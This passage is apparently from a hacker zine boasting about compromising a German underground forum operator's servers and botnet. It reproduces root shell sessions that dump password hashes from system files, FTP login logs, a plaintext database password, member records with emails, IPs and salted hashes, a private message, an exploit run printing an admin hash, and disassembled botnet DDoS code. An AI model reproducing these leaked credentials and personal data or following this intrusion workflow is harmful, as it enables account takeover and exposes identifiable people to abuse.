_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
mysql:*:88:88::0:0:MySQL Daemon:/nonexistent:/sbin/nologin
postfix:*:125:125::0:0:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin
ucsu:$1$rkQkyHD4$SPar9t/apgqXI9iBUBSh/0:1002:1002::0:0:User &:/home/ucsu:/usr/local/bin/bash
true:$1$bWcK0H74$NTULoy82dfWaevrF2Hf.T/:1003:1003::0:0:User &:/home/true:/sbin/nologin
symb:$1$Lx5.ll9w$uMdF6FKqh4TuC5QuazVQ31:1006:1006::0:0:User &:/home/symb:/bin/sh
hosting:$1$ptOUAPmM$7N/IB1xCXt9x.ft34Dlk/.:1008:1008::0:0:User &:/home/hosting:/sbin/nologin
gtbros:$1$atXPT9B1$qNpYOTWDHlcis3ldbFSjg/:1001:1001::0:0:User &:/home/gtbros:/sbin/nologin
relite:$1$c7m4u7CP$P6QVZVnvxhIqvJRAoZ87j0:1007:1007::0:0:User &:/home/relite:/bin/sh
wayne:$1$SCxNrKiE$iA2K05rvKgbGW/yrdqlVn1:1004:1004::0:0:User &:/home/wayne:/sbin/nologin
ixde:$1$te1KzFVe$gRVE863DVX8QmLT.Tpsvp0:1009:1009::0:0:User &:/home/ixde:/sbin/nologin
backspace:$1$ZPiFb/ga$z0cTF3T8CV7m0guoYVsJJ/:1005:1005::0:0:User &:/home/backspace:/bin/sh
lcf:$1$85k5c7VQ$5nqIFiZbOBFD5Z9LTxmd1.:1000:1000::0:0:User &:/home/lcf:/bin/sh

# last
ixde             ftp      94.220.134.71    Tue Oct 11 17:33 - 17:44  (00:10)
ixde             ftp      85.17.97.27      Tue Oct 11 17:25 - 17:27  (00:01)
ixde             ftp      85.17.97.27      Tue Oct 11 17:25 - 17:31  (00:06)
ixde             ftp      94.220.134.71    Tue Oct 11 16:37 - 16:41  (00:04)
ixde             ftp      94.220.134.71    Tue Oct 11 16:19 - 16:27  (00:07)
ucsu             ftp      193.107.17.239   Tue Oct 11 11:31 - 11:32  (00:00)
ixde             ftp      94.220.134.71    Mon Oct 10 15:44 - 15:48  (00:03)
ixde             ftp      94.220.134.71    Sun Oct  9 20:42 - 20:47  (00:04)
ucsu             ftp      77.20.18.64      Sat Oct  8 17:04 - 17:07  (00:03)
ucsu             ftp      77.20.18.64      Sat Oct  8 12:57 - 13:00  (00:03)
ixde             ftp      217.255.238.21   Fri Oct  7 14:18 - 14:21  (00:03)
ixde             ftp      217.255.238.21   Fri Oct  7 14:01 - 14:06  (00:04)
ixde             ftp      217.255.238.21   Fri Oct  7 13:56 - 13:58  (00:01)
ixde             ftp      217.255.238.21   Fri Oct  7 13:54 - 13:55  (00:01)
ixde             ftp      217.255.238.21   Fri Oct  7 13:54 - 13:57  (00:03)
ixde             ftp      217.255.238.21   Fri Oct  7 13:51 - 13:52  (00:01)
ixde             ftp      217.255.238.21   Fri Oct  7 13:49 - 13:52  (00:03)
ixde             ftp      217.255.238.21   Fri Oct  7 13:47 - 13:48  (00:01)
ixde             ftp      217.255.238.21   Fri Oct  7 13:45 - 13:48  (00:03)
ixde             ftp      217.255.238.21   Fri Oct  7 13:44 - 13:45  (00:01)
ixde             ftp      217.255.238.21   Fri Oct  7 13:42 - 13:44  (00:01)
ixde             ftp      94.220.134.71    Fri Oct  7 13:40 - 13:46  (00:05)
ixde             ftp      217.255.238.21   Fri Oct  7 13:39 - 13:45  (00:05)
backspace        ftp      217.23.8.127     Wed Oct  5 11:34 - 11:59  (00:24)
ucsu             ftp      77.20.18.64      Tue Oct  4 17:10 - 17:13  (00:03)
backspace        ftp      95.128.242.224   Mon Oct  3 22:29 - 22:39  (00:10)
true             ftp      77.20.18.64      Mon Oct  3 16:59 - 17:00  (00:01)
true             ftp      77.20.18.64      Mon Oct  3 16:58 - 16:59  (00:01)
true             ftp      77.20.18.64      Mon Oct  3 16:58 - 17:01  (00:03)
true             ftp      77.20.18.64      Mon Oct  3 16:54 - 16:57  (00:03)
ixde             ftp      94.220.134.71    Mon Oct  3 09:38 - 10:07  (00:29)
ixde             ftp      94.220.134.71    Mon Oct  3 09:11 - 09:17  (00:05)
ixde             ftp      94.220.134.71    Sun Oct  2 23:04 - 23:04  (00:00)
ixde             ftp      94.220.134.71    Sun Oct  2 23:01 - 23:04  (00:03)
ixde             ftp      94.220.134.71    Sun Oct  2 22:31 - 22:45  (00:13)
ixde             ftp      94.220.134.71    Sun Oct  2 22:29 - 22:45  (00:15)

# host 77.20.18.64
64.18.20.77.in-addr.arpa domain name pointer 77-20-18-64-dynip.superkabel.de.

# there we go^C

# cd /home/ucsu

# ls -la

total 32
drwxr-x---   8 ucsu  www     512 Aug 16 17:06 .
drwxr-x--x  13 root  wheel   512 Sep 22 21:06 ..
drwxrwx---   2 ucsu  www     512 May  6 13:08 abuse.undercover.su
drwxrwx---   2 ucsu  www     512 Aug 16 00:12 delict.cc
drwxrwx---   2 ucsu  www     512 Apr 13 13:04 moneymake.us
drwxrwx---   3 ucsu  www     512 Apr  7  2011 scene-sector.to
drwxrwx---   2 ucsu  www    2048 Oct 11 19:57 temp
drwxrwx---  10 ucsu  www    1024 Oct  8 17:04 undercover.su

# cd abuse.undercover.su

# ls -la

total 12
drwxrwx---  2 ucsu  www   512 May  6 13:08 .
drwxr-x---  8 ucsu  www   512 Aug 16 17:06 ..
-rw-r--r--  1 ucsu  www  1034 May  6 13:08 index.html

# cd ..
# cd delict.cc

# ls -la

total 100
drwxrwx---  2 ucsu  www    512 Aug 16 00:12 .
drwxr-x---  8 ucsu  www    512 Aug 16 17:06 ..
-rw-r--r--  1 ucsu  www    423 Aug 15 23:46 index.php
-rw-r--r--  1 ucsu  www  44909 Aug 16 00:12 mainlogo.png

# cd ..

# cd moneymake.us

# ls -la
total 12
drwxrwx---  2 ucsu  www  512 Apr 13 13:04 .
drwxr-x---  8 ucsu  www  512 Aug 16 17:06 ..
-rw-r--r--  1 root  www  261 Apr 13 13:04 index.php

# cat index.php
<html>
<head>

<title>Undercover.SU</title>

<meta http-equiv="Content-type" content="text/html; charset=iso-8859-1">
<meta http-equiv="refresh" content="0; URL=http://undercover.su/ipboard/">

</head>

<body>
Sie werden weitergeleitet... 
</body>
# cd ..

# cd scene-sector.to

# ls -la
total 16
drwxrwx---  3 ucsu  www  512 Apr  7  2011 .
drwxr-x---  8 ucsu  www  512 Aug 16 17:06 ..
-rw-r--r--  1 root  www  261 Apr  5  2011 index.php
drwxr-xr-x  6 root  www  512 Apr  9  2011 test
# cd test

# ls -la

total 24
drwxr-xr-x  6 root  www  512 Apr  9  2011 .
drwxrwx---  3 ucsu  www  512 Apr  7  2011 ..
drwxrwxrwx  3 root  www  512 Apr  7  2011 4234047??hscjfsjdf89ds89898j34jjfdhhs9322jss
drwxr-xr-x  5 root  www  512 Apr  7  2011 admin
drwxr-xr-x  3 root  www  512 Apr  7  2011 designe
drwxr-xr-x  3 root  www  512 Apr  9  2011 img

# ls -la
total 15032
drwxrwx---  10 ucsu  www     1024 Oct  8 17:04 .
drwxr-x---   8 ucsu  www      512 Aug 16 17:06 ..
drwxr-xr-x   8 root  www      512 Apr 30 00:07 .trash
-rw-r--r--   1 root  www  1799843 May  5 18:04 SpyEye.Builder.v1.2.99.zip
-rw-r--r--   1 root  www   320512 Jun  6 20:45 back.exe
-rw-r--r--   1 root  www   118784 Jun  6 14:22 backs.exe
-rw-r--r--   1 root  www  4538223 Jun  6 14:45 backspace.rar
-rw-r--r--   1 root  www     7168 May 11 13:26 elite_4.2.exe
drwxr-xr-x   3 ucsu  www      512 Sep 29 18:50 files
-rw-r--r--   1 ucsu  www      408 Feb  6  2011 ico.png
-rw-r--r--   1 ucsu  www     1053 Feb  6  2011 icon_icq.png
-rw-r--r--   1 ucsu  www      536 Aug 21 15:59 index.php
-rw-r--r--   1 root  www      515 May  4 10:00 index.php_
-rw-r--r--   1 ucsu  www      162 Feb  6  2011 index_.html
drwxr-xr-x  12 ucsu  www      512 Sep 27 12:59 ipb3
drwxr-xr-x   2 root  www      512 May  4 09:58 ipboard
drwxr-xr-x  21 root  www     1024 Apr 16 16:07 ipboard___beta
-rw-r--r--   1 ucsu  www    25474 Feb  6  2011 logo.jpg
-rw-r--r--   1 ucsu  www     4657 Feb  6  2011 logo.png
-rw-r--r--   1 root  www    44909 May  4 09:53 mainlogo.png
drwxr-xr-x   2 root  www      512 Jun  6 14:31 private
-rw-r--r--   1 root  www   253952 May  5 16:32 snap.exe
drwxr-xr-x   3 root  www      512 Aug 14 22:01 snapshot
-rw-r--r--   1 root  www   118784 Jun  6 14:39 stansecu.exe
drwxr-xr-x   3 root  www      512 May  4 11:15 static
-rw-r--r--   1 ucsu  www   107003 Sep 16 16:20 test.rar
-rw-r--r--   1 root  www   118784 May 18 19:35 v2.exe
-rw-r--r--   1 root  www   118784 May 18 19:35 v3.exe

# cd private
# ls -la
total 8908
drwxr-xr-x   2 root  www      512 Jun  6 14:31 .
drwxrwx---  10 ucsu  www     1024 Oct  8 17:04 ..
-rw-r--r--   1 root  www  4538210 Jun  6 14:32 backspace.rar
-rw-r--r--   1 root  www       44 Jun  6 13:23 index.php

# cat index.php
Certificate not found.
-- Access prohibited

Alright, before we continue, lets have  a  look  at  some  of  k!LLu's
enhancements he stated after Undercover.su left its beta status:

 ____________________________________________________________________ 
|                         __          __                             |
|     .-----.--.--.-----.|  |_.-----.|  |--.-----.--.--.             |
|     |  _  |  |  |  _  ||   _|  -__||  _  |  _  |_   _|             |
|     |__   |_____|_____||____|_____||_____|_____|__.__|             |
|________|__|________________________________________________________|
|                                                                    |
|   k!LLu: Fassen wir kurz zusammen, unsere Datenbank enthält nun    |
|          keine IP Adressen mehr, es ist nahezu unmöglich           |
|          IP-Adressen mitzuloggen, die Passwörter sind "uncrackbar" |
|          gespeichert. Alle Beiträge, E-Mail's, Themen und PM's     |
|          sind unlesbar verschluesselt. Selbst ein Hack wäre nun    |
|          völlig egal und sinnfrei!                                 |
|____________________________________________________________________|

As we can see, it clearly should not be possible to take any advantage
of hacking undercover.su because of its highly encrypted database.

# grep ucsu /var/log/proftpd-transfer.log | tail
Thu Sep 29 16:57:38 2011 0 77.20.18.64 1994 /home/ucsu/undercover.su/ipb3/public/style_css/css_8/calendar_select.css a _ o r ucsu ftp 0 * c
Thu Sep 29 16:59:00 2011 0 77.20.18.64 79303 /home/ucsu/undercover.su/ipb3/public/style_css/ipb_styles.css a _ i r ucsu ftp 0 * c
Thu Sep 29 17:03:42 2011 1 77.20.18.64 93766 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg b _ i r ucsu ftp 0 * c
Thu Sep 29 17:07:28 2011 0 77.20.18.64 34809 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg b _ i r ucsu ftp 0 * c
Thu Sep 29 17:08:43 2011 0 77.20.18.64 33154 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg b _ i r ucsu ftp 0 * c
Thu Sep 29 17:08:59 2011 0 77.20.18.64 33154 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg a _ d r ucsu ftp 0 * c
Thu Sep 29 17:13:31 2011 0 77.20.18.64 41797 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg b _ i r ucsu ftp 0 * c
Thu Sep 29 17:17:35 2011 0 77.20.18.64 59481 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg b _ i r ucsu ftp 0 * c
Thu Sep 29 17:19:14 2011 1 77.20.18.64 93766 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg b _ i r ucsu ftp 0 * c
Thu Sep 29 18:49:59 2011 1 77.20.18.64 160997 /home/ucsu/undercover.su/files/design.PNG b _ i r ucsu ftp 0 * c

Seems like undercover.su/ipb3 is the latest version of k!LLu's project

# cd ipb3

# cat conf_global.php
<?php
$INFO['sql_driver']			=	'mysql';
$INFO['sql_host']			=	'localhost';
$INFO['sql_database']			=	'ucsu_ipb';
$INFO['sql_user']			=	'ucsu_ipb';
$INFO['sql_pass']			=	'712987asdxyas';
$INFO['sql_tbl_prefix']			=	'ucsec_';
$INFO['sql_debug']			=	'0';
$INFO['sql_charset']			=	'';
$INFO['board_start']			=	'1317041609';
$INFO['installed']			=	'1';
$INFO['php_ext']			=	'php';
$INFO['safe_mode']			=	'0';
$INFO['board_url']			=	'http://www.undercover.su/ipb3';
$INFO['banned_group']			=	'5';
$INFO['admin_group']			=	'4';
$INFO['guest_group']			=	'2';
$INFO['member_group']			=	'3';
$INFO['auth_group']			=	'1';
$INFO['use_friendly_urls']			=	'1';
$INFO['_jsDebug']			=	'0';
$INFO['mysql_tbl_type']			=	'MyISAM';

define('IN_DEV', 0);

?>

# mysql -u ucsu_ipb ucsu_ipb -p712987asdxyas
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 465217
Server version: 5.0.89-log FreeBSD port: mysql-server-5.0.89

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> SELECT member_id, name, email, ip_address, members_pass_hash, members_pass_salt FROM ucsec_members LIMIT 10;
+-----------+-----------+---------------------------+-------------+----------------------------------+-------------------+
| member_id | name      | email                     | ip_address  | members_pass_hash                | members_pass_salt |
+-----------+-----------+---------------------------+-------------+----------------------------------+-------------------+
|         1 | s1mpl3x   | purplera1n@safe-mail.net  | 77.20.18.64 | 517cc224929adfa4906328f1ae42bf22 | !4w3=             | 
|         2 | medi8tor  | ace1992@gmx.net           |             | 4f6f0b6261c8363a71b6fdfdc037610d | J-|`H             | 
|         3 | usrid3    | usrid3@undercover.su      |             | 058089135cfab52cc9d1ba6ef32ea202 | 0]qxI             | 
|         4 | usrid4    | usrid4@undercover.su      |             | f29637821bb0e05a55dc8ebf9e24e06f | #}(TJ             | 
|         5 | test      | test@mail.de              |             | 0bb5a87636ebda286ceea9494d48dc12 | 9N2t,             | 
|         6 | Man4ic    | mrajabi@hotmail.de        |             | f0a77e175ea95c9b24e2e24eba27c51b | Q}lRm             | 
|         7 | bin       | binary@secure-mail.biz    |             | 8ae8499691d35b04442a6ba87a92a9fa | JM;3!             | 
|         8 | Ixde      | angela.krueger@hotmail.de |             | 5b7eee531e99f89be45ff928d7e045ab | qfi7X             | 
|         9 | casy      | 76671253@trash-mail.com   |             | abddc59b20ad591d10b47b02bd70d426 | 4G:(s             | 
|        10 | soldier16 | musekeule@yahoo.de        |             | 1079fe12b4d9e3429c8975920c79a161 | *Y$cj             | 
+-----------+-----------+---------------------------+-------------+----------------------------------+-------------------+
10 rows in set (0.00 sec)

mysql> SELECT msg_post, msg_ip_address FROM ucsec_message_posts WHERE msg_author_id = 1 LIMIT 1;
+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------+
| msg_post                                                                                                                                                                                                      | msg_ip_address |
+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------+
| Meld dich ICQ 83885,<br />wenn dein Tut haelt was es verspricht kann ich dir auch gerne ne Menge in Bar zukommen lassen -- je nachdem wieviel im Shop ist,<br />kann 15k Ukash daily nahezu Instant auscashen | 7              |
+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------+
1 row in set (0.00 sec)

mysql> Ctrl-C -- exit!
Aborted

#

WHAT THE FUCK IS THIS GUY TALKING ABOUT?!@# It's  driving  us  insane,
because we thought that hacking Undercover.su would be at least a bit,
a _BIT_, of a challenge. But fucking NO! k!LLu is by far  the  dumbest
person to be ever slapattacked by us. That's why we were not satisfied
with the simple ownage of Undercover.su and headed over to  his  other
projects ...

                                                         ,;~;,        
                                                        _/\           
                                                        \  )          
                                                (\\      ())          
                                                /';;,,  // |          
-------====={  k!LLu's Botnet  }========))))))))))))))=m(  )_ __      
                                               | ,(.' '~/()' '  '\    
We could  now tell  you a  story about love and ~  |     ||(      );, 
romance,  about  people   dying and   fighting as  (   ,;.)-\    / ';,
heroes,  about  people  suffering and crying. But   \ (       \ (     
instead,  we  now shall tell you the  story of how   ||         \\    
we raped k!LLu and his  little botnet  to hell and  /_(         /_(   
back. So here it is:         .                                        
                            / \                                       
                           _\ /_                                      
                 .     .  (,'v`.)  .     .                            
                 \)   ( )  ,' `.  ( )   (/                            
                  \`. / `-'     `-' \ ,'/                             
                   : '    _______    ' :                              
                   |  _,-'  ,-.  `-._  |                              
                   |,' ( )__`-'__( ) `.|                              
                   (|,-,'-._   _.-`.-.|)                              
                   /  /<(o )> <(o )>\  \                              
                   :  :     | |     :  :                              
                   |  |     ; :     |  |  ------  k!LLu, thou shall   
                   |  |    (.-.)    |  |          officially be owned 
                   |  |  ,' ___ `.  |  |          to fuck.            
                   ;  |)/ ,'---'. \(|  :                              
               _,-/   |/\(       )/\|   \-._                          
         _..--'.-(    |   `-'''-'   |    )-.`--.._                    
                  `.  ;`._________,':  ,'                             
                 ,' `/               \'`.                             
                     `------.------'                                  

One thing that has always been connected to k!LLu was  the  botnet  he
kept bragging about. It probably all started back at crimenetwork when
he ddosed competitors to at least get some  visitors.  Knowing  k!LLu,
one would think his botnet was just imaginary like most of  the  other
things he rambles about. But no, k!LLu actually had a botnet for which
he used his own  botsoftware  "Snap  Reloaded".  Unsurprisingly,  this
piece of malware is just as bad as most of the  other  things  he  has
been  working  on.  If  you  don't  find   at   least   two   pre-auth
vulnerabilities within a minute of looking at the panel's  source  you
must be seriously retarded and it was accordingly easy to  break  into
his boxes. k!LLu hosts more than one panel most of which are run  from
separate VMs and probably belong to some of  his  customers.  In  fact
everyone who's  hosting  their  net  on  k!llu's  server  is  actually
donating  bots  to  k!LLu.  He  is  a  master   of   advertising   but
unfortunately, he doesn't take telling the truth too seriously. That's
why we'll take a look into the "Snap Reloaded" bot he is selling.

 ____________________________________________________________________ 
|                         __          __                             |
|     .-----.--.--.-----.|  |_.-----.|  |--.-----.--.--.             |
|     |  _  |  |  |  _  ||   _|  -__||  _  |  _  |_   _|             |
|     |__   |_____|_____||____|_____||_____|_____|__.__|             |
|________|__|________________________________________________________|
|                                                                    |
|  [+] User-Mode (ring3) r00tkit                                     |
|  -> [+] run's as a service and hide himself                        |
|  -> [+] hides&protect root process                                 |
|  -> [+] hides&protect files                                        |
|  -> [+] hides root processes                                       |
|  -> [+] hides used local&remote TCP Port(s) <- thx to jeffosz      |
|  -> [+] hides used local&remote UDP Port(s) <- thx to jeffosz      |
|  -> [+] hides used regkey''s                                       |
|____________________________________________________________________|

You don't think k!LLu'd be shameless enough to _invent_ a feature?  He
did. Well, at least not a single binary we  could  get  our  hands  on
showed any signs of a rootkit. A 3-year-old would be able to kill  the
process and kick that piece of shit into the trashcan.
 ____________________________________________________________________ 
|                         __          __                             |
|     .-----.--.--.-----.|  |_.-----.|  |--.-----.--.--.             |
|     |  _  |  |  |  _  ||   _|  -__||  _  |  _  |_   _|             |
|     |__   |_____|_____||____|_____||_____|_____|__.__|             |
|________|__|________________________________________________________|
|                                                                    |
|  [+] METAMORPHIC architecture                                      |
|  -> [+] use random legit process,file & service names              |
|  -> [+] generate a unique stub every run                           |
|  -> [+] whole software gets metamorph virtualized byte per byte    |
|____________________________________________________________________|

Again, a hardcoded list of processnames, that aren't at all "legit" is
not that cool. And, unsurprisingly, the  bot  isn't  virtualized.  But
hey, he used  UPX, we give him that.
 ____________________________________________________________________ 
|                         __          __                             |
|     .-----.--.--.-----.|  |_.-----.|  |--.-----.--.--.             |
|     |  _  |  |  |  _  ||   _|  -__||  _  |  _  |_   _|             |
|     |__   |_____|_____||____|_____||_____|_____|__.__|             |
|________|__|________________________________________________________|
|                                                                    |
|  [+] webpanel developped with dreamweaver cs5 and own ajax         |
|      framework using mysql and php                                 |
|      -- no ressource wasting jquery/extJS shit like kerber0s,      |
|         EliteLoader                                                |
|  [+] multi theme support                                           |
|  [+] multi command support => every victim can do as many threads  |
|      as you want                                                   |
|  [+] reliable protocoll which creates the lowest possible server   |
|      load                                                          |
|  [+] modularized structure                                         |
|  [+] Blocks common Trackers                                        |
|  [+] dynamic ConnectionDelay => if server load raises, delay       |
|      raises and you are able to host over 25000Victims on a little |
|      VPS                                                           |
|____________________________________________________________________|

The next thing on the list is the  webpanel.  It's  partially  ioncube
encoded but still runs perfectly without even  changing  anything.  As
said above, it's also pretty straight forward to find several vulns in
it. But wait:
 ____________________________________________________________________ 
|                         __          __                             |
|     .-----.--.--.-----.|  |_.-----.|  |--.-----.--.--.             |
|     |  _  |  |  |  _  ||   _|  -__||  _  |  _  |_   _|             |
|     |__   |_____|_____||____|_____||_____|_____|__.__|             |
|________|__|________________________________________________________|
|                                                                    |
|  [+] XSS/SQLi Prevention Firewall                                  |
|____________________________________________________________________|

And we really gotta say: this thing is the shit. Well,  of  course  it
doesn't exist but who'd bother and check anyways?

$ ./killu_u_r_lame.pl bgate.secure-host.in
  bl1ng bl1ng!
  admin:76a2173be6393254e72ffa4d6df1030a
$ 
 ____________________________________________________________________ 
|                         __          __                             |
|     .-----.--.--.-----.|  |_.-----.|  |--.-----.--.--.             |
|     |  _  |  |  |  _  ||   _|  -__||  _  |  _  |_   _|             |
|     |__   |_____|_____||____|_____||_____|_____|__.__|             |
|________|__|________________________________________________________|
|                                                                    |
|  Another interessting thing is, thats is the WORLDS FIRST BOT      |
|  which patches tcpip.sys/tcpstack on ALL WIN-OS(including Win8)    |
|  via DCI and Windows-own Testsigning Mode                          |
|  This allows us again to use half-open connections and rawSockets! |
|  and grant us to use things like IP Spoofing or REAL SYNFLOOD !    |
|                                                                    |
|  This is the really awesome part, of this state-of-the-Art Botnet  |
|  software! DDoS Class is written in pure (m)ASM to get the maximum |
|  possible stability and maximum possible Attack-strength/Power.    |
|  Everyone who says his Bot is stronger, LIES                       |
|  There's NO WAY to get DDoS stronger!                              |
|____________________________________________________________________|

Wow, k!LLu talking about people lying, somewhat ironic. Let's  have  a
look at this badass functions of his.

[...]
movzx   eax, byte ptr [ebp+14]        ; |
mov     dword ptr [ebp-C], ebx        ; |
mov     dword ptr [ebp-8], esi        ; |
mov     esi, dword ptr [ebp+8]        ; |
mov     byte ptr [ebp-11], al         ; |
xor     eax, eax                      ; |
mov     dword ptr [ebp-4], edi        ; |
mov     edi, dword ptr [ebp+C]        ; |
movsx   ebx, word ptr [ebp+10]        ; |
mov     dword ptr [esp+8], eax        ; |
mov     eax, 1                        ; |
mov     dword ptr [esp+4], eax        ; |
mov     dword ptr [esp], 2            ; |
call    near dword ptr [41E0E8]       ; \socket
mov     dword ptr [esi+190], eax
sub     esp, 0C
inc     eax                           ; |
je      004029E6                      ; |
movzx   eax, bx                       ; |
mov     dword ptr [esp], eax          ; |
call    near dword ptr [41E0E0]       ; \ntohs
mov     ecx, 2
mov     word ptr [esi+194], cx
sub     esp, 4
mov     word ptr [esi+196], ax        ; |
mov     eax, dword ptr [edi]          ; |
mov     dword ptr [esp], eax          ; |
call    near dword ptr [41E0E4]       ; \inet_addr
sub     esp, 4
inc     eax                           ; |
je      00402A10                      ; |
mov     eax, dword ptr [edi]          ; |
mov     dword ptr [esp], eax          ; |
call    near dword ptr [41E0E4]       ; \inet_addr
sub     esp, 4
mov     dword ptr [esi+198], eax
cmp     byte ptr [ebp-11], 0
jnz     00402A02
mov     dword ptr [ebp-10], 1
lea     eax, dword ptr [ebp-10]       ; |
mov     dword ptr [esp+8], eax        ; |
mov     eax, 8004667E                 ; |
mov     dword ptr [esp+4], eax        ; |
mov     eax, dword ptr [esi+190]      ; |
mov     dword ptr [esp], eax          ; |
call    near dword ptr [41E0A8]       ; \ioctlsocket
mov     eax, 10
sub     esp, 0C
mov     dword ptr [esp+8], eax        ; |
lea     eax, dword ptr [esi+194]      ; |
mov     dword ptr [esp+4], eax        ; |
mov     eax, dword ptr [esi+190]      ; |
mov     dword ptr [esp], eax          ; |
call    near dword ptr [41E0D8]       ; \connect
[...]

This is an excerpt from his "synflood"  function.  It's  obvious  that
creating a new sockaddr structure for every time you call  connect  is
not efficient at all. He also seems  to  think  setting  a  socket  to
non-blocking mode via ioctlsocket would make his simple tcp flood look
like a synflood. But let's look at  the  code  that  calls  this  from
within the ddos thread and  quickly  reveals  that  this  is  compiler
generated rather than "plain assembly".

push    ebp
mov     ebp, esp
[...]
mov     eax, dword ptr [41E06C]       ; |||
mov     eax, dword ptr [eax+14]       ; |||
mov     dword ptr [esp], eax          ; |||
call    <jmp.&msvcrt.atoi>            ; ||\atoi
mov     dword ptr [ebp-70], eax       ; ||
mov     eax, dword ptr [41E06C]       ; ||
mov     eax, dword ptr [eax+C]        ; ||
mov     dword ptr [esp], eax          ; ||
call    <jmp.&msvcrt.atoi>            ; |\atoi
mov     dword ptr [ebp-74], eax       ; |
mov     eax, dword ptr [41E06C]       ; |
mov     eax, dword ptr [eax+8]        ; |
mov     dword ptr [esp], eax          ; |
call    <jmp.&msvcrt.atoi>            ; \atoi
[...]
mov     esi, esi                      ; plain asm in the hewd
[...]
mov     dword ptr [esp], 0            ; |
call    <jmp.&KERNEL32.ExitThread>    ; \ExitThread
[...]

But don't be too sad, k!LLu.  We  got  some  exciting  news  for  you:
userspace ddos code is not the bottleneck. You're probably  trying  to
get your bots back after we rmd your box but we're afraid we were able
to clean a majority of them up.

# uname -a
Linux link.cyberhost.kz 2.6.18-238.9.1.el5.028stab089.1PAE #1 SMP Thu Apr 14 14:38:02 MSD 2011 i686 athlon i386 GNU/Linux

# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
lxlabs:x:500:500::/home/lxlabs:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
truevm:x:503:503:System User for 130:/home/truevm:/usr/bin/lxopenvz
stansecuvm:x:504:504:System User for 140:/home/stansecuvm:/usr/bin/lxopenvz
bnetvm:x:506:506:System User for 160:/home/bnetvm:/usr/bin/lxopenvz
scriptstvm:x:508:508:System User for 180:/home/scriptstvm:/usr/bin/lxopenvz
spikevm:x:514:514:System User for 240:/home/spikevm:/usr/bin/lxopenvz
xtothecvm:x:515:515:System User for 250:/home/xtothecvm:/usr/bin/lxopenvz
y00vm:x:516:516:System User for 260:/home/y00vm:/usr/bin/lxopenvz
iodasvm:x:517:517:System User for 270:/home/iodasvm:/usr/bin/lxopenvz
rootvm:x:520:520:System User for 300:/home/rootvm:/usr/bin/lxopenvz
stansocksvm:x:521:521:System User for 310:/home/stansocksvm:/usr/bin/lxopenvz
bdgatevm:x:524:524:System User for 340:/home/bdgatevm:/usr/bin/lxopenvz
fredvm:x:525:525:System User for 350:/home/fredvm:/usr/bin/lxopenvz
spike80vm:x:526:526:System User for 360:/home/spike80vm:/usr/bin/lxopenvz
ixdevm:x:527:527:System User for 370:/home/ixdevm:/usr/bin/lxopenvz
wohovm:x:528:528:System User for 380:/home/wohovm:/usr/bin/lxopenvz
sethvm:x:529:529:System User for 390:/home/sethvm:/usr/bin/lxopenvz

# cat /etc/shadow
root:$1$v.vPGI.9$s9ss0TBUPqOe9X3ufPT4W1:15105:0:99999:7:::
bin:*:15105:0:99999:7:::
daemon:*:15105:0:99999:7:::
adm:*:15105:0:99999:7:::
lp:*:15105:0:99999:7:::
sync:*:15105:0:99999:7:::
shutdown:*:15105:0:99999:7:::
halt:*:15105:0:99999:7:::
mail:*:15105:0:99999:7:::
news:*:15105:0:99999:7:::
uucp:*:15105:0:99999:7:::
operator:*:15105:0:99999:7:::
games:*:15105:0:99999:7:::
gopher:*:15105:0:99999:7:::
ftp:*:15105:0:99999:7:::
